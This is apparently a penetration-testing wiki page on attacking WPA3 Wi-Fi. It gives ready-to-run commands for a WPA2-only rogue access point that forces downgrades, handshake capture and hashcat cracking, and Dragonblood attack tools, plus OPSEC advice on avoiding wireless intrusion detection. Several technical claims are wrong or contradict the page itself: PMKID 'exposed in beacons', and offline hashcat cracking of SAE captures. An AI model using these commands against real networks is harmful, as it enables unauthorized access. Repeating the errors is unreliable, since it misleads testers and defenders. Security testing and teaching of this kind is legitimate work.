WPA3 Attacks
#Overview
WPA3 replaces WPA2-PSK with Simultaneous Authentication of Equals (SAE), a dragonfly key exchange that provides forward secrecy and resistance to offline dictionary attacks. However, WPA3 deployments — particularly in transition mode (WPA3/WPA2 mixed) — have significant vulnerabilities. The Dragonblood vulnerability suite (2019) and subsequent research have demonstrated that WPA3's security depends heavily on correct implementation.
WPA3-Personal (SAE) is fundamentally harder to crack than WPA2-PSK because the SAE handshake does not expose enough information for offline dictionary attacks — but implementation flaws and transition-mode downgrades create practical attack paths.
#WPA3 Security Model
| Feature | WPA2-PSK | WPA3-SAE | WPA3-Transition |
|---|---|---|---|
| Key exchange | 4-way handshake | SAE dragonfly | SAE for WPA3, PSK for WPA2 |
| Offline dictionary | Vulnerable | Resistant | WPA2 clients still vulnerable |
| Forward secrecy | No | Yes | WPA3 clients only |
| PMKID | Exposed in beacons | Not exposed | Exposed for WPA2 clients |
| Management frames | Optional | Required (802.11w) | Required for WPA3 |
| Password strength | Critical (offline crack) | Less critical | WPA2 clients still at risk |
#Attack 1: Transition Mode Downgrade (WPA3 → WPA2)
The most practical WPA3 attack. Transition mode (also called "WPA3-Personal Transition Mode" or "WPA2/WPA3 Mixed Mode") allows WPA2 clients to connect. An attacker can force a client to use WPA2, then capture the traditional 4-way handshake for offline cracking.
#Detection
# Identify WPA3 transition mode networks
sudo airodump-ng wlan0mon --encrypt wpa3
# Check beacon frames for transition mode indicators
# Look for both "RSN IE" with SAE AKM and "RSN IE" with PSK AKM
tshark -r capture.cap -Y 'wlan.fc.type_subtype == 0x0080' \
-T fields -e wlan.ssid -e wlan.rsn.akm
BASH
#Downgrade Attack
# Step 1: Set up a rogue AP advertising WPA2-only for the same SSID
# This forces WPA3-capable clients to fall back to WPA2
# Use hostapd-wpe with WPA2-only configuration
cat > /tmp/hostapd-wpe-downgrade.conf << 'EOF'
interface=wlan0mon
ssid=<TARGET_SSID>
hw_mode=g
channel=<CH>
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_passphrase=anything
EOF
# Step 2: Capture WPA2 handshake from downgraded clients
sudo airodump-ng wlan0mon --channel <CH> --bssid <ROGUE_MAC> --write downgrade
# Step 3: Crack the WPA2 handshake
hcxpcapngtool -o downgrade.hc22000 downgrade-01.cap
hashcat -m 22000 downgrade.hc22000 wordlist.txt
BASH
#wpa_supplicant Downgrade (Client-Side)
# Force a specific client to use WPA2 even when WPA3 is available
# Edit /etc/wpa_supplicant.conf
network={
ssid="<TARGET_SSID>"
key_mgmt=WPA-PSK
psk="<password>"
# Explicitly request WPA2 (no SAE)
}
# Or use wpa_cli to force WPA2
wpa_cli -i wlan0 remove_network 0
wpa_cli -i wlan0 add_network
wpa_cli -i wlan0 set_network 0 ssid '"<TARGET_SSID>"'
wpa_cli -i wlan0 set_network 0 key_mgmt WPA-PSK
wpa_cli -i wlan0 set_network 0 psk '"<password>"'
wpa_cli -i wlan0 enable_network 0
BASH
#Attack 2: Dragonblood (CVE-2019-15130, CVE-2019-15131)
The Dragonblood vulnerability suite targets SAE implementation flaws in WPA3.
#CVE-2019-15130: SAE Group Downgrade
Forces the SAE handshake to use a weak (low-order) elliptic curve group, allowing password recovery.
# Detect vulnerable SAE groups
sudo airodump-ng wlan0mon --encrypt wpa3
# Some APs accept multiple SAE groups
# If the AP accepts group 19 (ECDH P-256) alongside other groups:
# 1. Start SAE authentication with the AP using a weak group
# 2. The AP may accept the downgrade
# 3. This can leak information about the password
# Practical exploitation requires custom tools
# See: https://github.com/vanhoefm/dragonblood
BASH
#CVE-2019-15131: Timing-Based Side Channel
The SAE password encoding function has timing variations that leak information about the password.
# Timing attack on SAE commit computation
# Measure response time for different password candidates
# Longer computation time indicates the password shares bytes with the candidate
# This is a theoretical attack requiring many SAE commit exchanges
# Practical exploitation requires significant interaction with the AP
# See: https://dragonblood.io/
BASH
#Dragonblood Tools
# Clone the Dragonblood proof-of-concept
git clone https://github.com/vanhoefm/dragonblood.git
cd dragonblood
# Downgrade attack tool
./downgrade_attack.py -i wlan0mon -s <SSID> -c <CH>
# Timing attack tool
./timing_attack.py -i wlan0mon -s <SSID> -c <CH>
BASH
#Attack 3: SAE Dictionary Attack
While SAE is resistant to passive offline dictionary attacks, active dictionary attacks are possible by repeatedly attempting SAE authentication.
# Active SAE dictionary attack with hashcat
# Hashcat mode 22000 supports SAE hashes captured via hcxdumptool
# Step 1: Capture SAE authentication frames
sudo hcxdumptool -i wlan0mon -o sae-capture.pcapng --active_bids=1 \
--rds=1 --rcv_client=1 --rcv_ap=1
# Step 2: Convert to hashcat format
hcxpcapngtool -o sae.hc22000 sae-capture.pcapng
# Step 3: Dictionary attack
hashcat -m 22000 sae.hc22000 wordlist.txt
# Step 4: With rules
hashcat -m 22000 sae.hc22000 wordlist.txt \
-r /usr/share/hashcat/rules/best64.rule
BASH
Note: SAE dictionary attacks are much slower than WPA2-PSK attacks because each candidate password requires a full SAE commit exchange with the AP, not just offline computation.
#Attack 4: Opportunistic Wireless Encryption (OWE)
OWE (RFC 8110) provides unauthenticated encryption for open networks. It uses Diffie-Hellman key exchange to encrypt traffic without authentication.
#OWE Vulnerabilities
# Detect OWE networks
sudo airodump-ng wlan0mon
# OWE networks show as "OWE" in the encryption column
# OWE downgrades: Force client to connect without encryption
# Some implementations fall back to open (unencrypted) when OWE fails
# OWE fingerprinting: The DH public value in association frames
# can be used to track clients across connections
BASH
#OWE Attack Scenarios
| Attack | Feasibility | Impact |
|---|---|---|
| Downgrade to open | High (if client allows) | Traffic sniffing |
| Client tracking | High | Location privacy |
| Man-in-the-middle | Low (DH key exchange) | Traffic modification |
| Rogue OWE AP | Medium | Credential harvesting unlikely |
#Attack 5: WPA3-Enterprise
WPA3-Enterprise uses 192-bit cryptographic suite (GCMP-256, SHA-384, HMAC-SHA-384) and requires certificate-based authentication (EAP-TLS). This is the strongest WiFi security configuration.
# WPA3-Enterprise is resistant to:
# - Offline dictionary attacks (certificate-based auth)
# - Downgrade attacks (mandatory 192-bit suite)
# - Key recovery (forward secrecy)
# Practical attacks against WPA3-Enterprise:
# 1. Certificate theft (steal client certificate from compromised device)
# 2. Rogue CA (forge certificates if CA private key is compromised)
# 3. Social engineering (phishing for credentials)
# 4. See [802.1X Attacks](../network-segmentation/8021x-attacks.md) for EAP-based attacks
BASH
#Practical Testing Methodology
#Lab Setup for WPA3 Testing
# Create a WPA3-SAE test AP using hostapd
cat > /tmp/hostapd-wpa3.conf << 'EOF'
interface=wlan0
driver=nl80211
ssid=WPA3-Test
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
sae_password=WPA3TestPassword123
sae_groups=19
ieee80211w=2
EOF
# Start the test AP
sudo hostapd /tmp/hostapd-wpa3.conf
BASH
#WPA3 Transition Mode Lab
# WPA3/WPA2 transition mode AP
cat > /tmp/hostapd-transition.conf << 'EOF'
interface=wlan0
driver=nl80211
ssid=WPA3-Transition
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=SAE WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=TransitionPassword
sae_password=TransitionPassword
sae_groups=19
ieee80211w=1
EOF
sudo hostapd /tmp/hostapd-transition.conf
BASH
#Detection and Defense
| Defense | Effectiveness |
|---|---|
| WPA3-SAE only mode (no transition) | Prevents downgrade attacks |
| 802.11w Management Frame Protection (required) | Prevents deauth attacks |
| Strong SAE passwords (>20 chars) | Resists active dictionary attacks |
| SAE-PK (SAE with Public Key) | Prevents rogue AP impersonation |
| AP firmware updates | Patches Dragonblood vulnerabilities |
#Common Pitfalls
- "WPA3 is uncrackable": WPA3-SAE is resistant to passive offline attacks, not immune to active attacks (downgrade, timing, dictionary).
- Transition mode is common: Many "WPA3" networks are actually WPA3-transition-mode, which means WPA2 downgrade is possible.
- SAE group downgrade: Some APs accept weak SAE groups. Test with the Dragonblood tools.
- Client behavior varies: Not all clients implement WPA3 correctly. Some will fall back to WPA2 silently.
- Hashcat mode confusion: Use
-m 22000for both WPA2-PSK and WPA3-SAE. The hash format includes the AKM type.
#OPSEC Considerations
- Active SAE dictionary attacks generate many authentication attempts — easily detected by WIDS
- Downgrade attacks create a rogue AP visible to wireless monitoring
- Dragonblood timing attacks require many SAE exchanges (thousands per candidate)
- WPS attacks on transition-mode APs are the noisiest approach but also the most likely to succeed
#Cross-References
- WPA/WPA2 Cracking — WPA2-PSK cracking (prerequisite knowledge)
- PMKID Attack — PMKID capture works against WPA2 clients in transition mode
- Deauthentication Attacks — MFP prevents deauth on WPA3
- Evil Twin & Rogue AP — Rogue AP for WPA3 downgrade
- 802.1X Attacks — WPA3-Enterprise EAP attacks
#Tool References
| Tool | Purpose | Link |
|---|---|---|
| hashcat | SAE hash cracking | https://hashcat.net/hashcat/ |
| hcxdumptool | SAE frame capture | https://github.com/ZerBea/hcxtools |
| Dragonblood | WPA3 downgrade/timing POC | https://github.com/vanhoefm/dragonblood |
| hostapd | WPA3 test AP setup | https://w1.fi/hostapd/ |
| wpa_supplicant | WPA3 client configuration | https://w1.fi/wpa_supplicant/ |